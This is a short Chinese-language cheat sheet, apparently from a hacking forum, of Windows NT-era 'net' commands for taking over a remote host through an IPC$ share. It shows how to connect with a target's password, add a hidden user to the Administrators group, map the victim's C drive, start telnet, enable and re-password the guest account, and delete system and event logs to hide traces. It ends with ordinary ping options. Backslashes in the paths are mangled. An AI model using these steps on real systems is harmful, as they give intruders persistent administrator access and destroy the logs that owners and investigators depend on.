IPC连接:格式 net use \对方IPipc$ "密码" user:"用户名" 『建立IPC连接~』 net use \对方IPipc$ /delete 『断开连接~』
以下操作需要在连接到对方主机后才可进行!!!
net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』
net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊!!!^_^』
net use z:\对方IPC$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』 net start telnet 『开启TELNET』 net user guest /active:yes 『激活GUEST』 net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』
『删除曰志的时候用!』 del c:winntsystem32logfiles*.* del c:winntsystem32config*.evt del c:winntsystem32dtclog*.* del c:winntsystem32*.log del c:winntsystem32*.txt del c:winnt*.txt del c:winnt*.log
M、PING命令:
-t :ping制定IP,知道网络断开或按CTRL+C结束! -a :解释PING IP的主机名 -n count :发送count指定的ECHO数据包,默认为4个!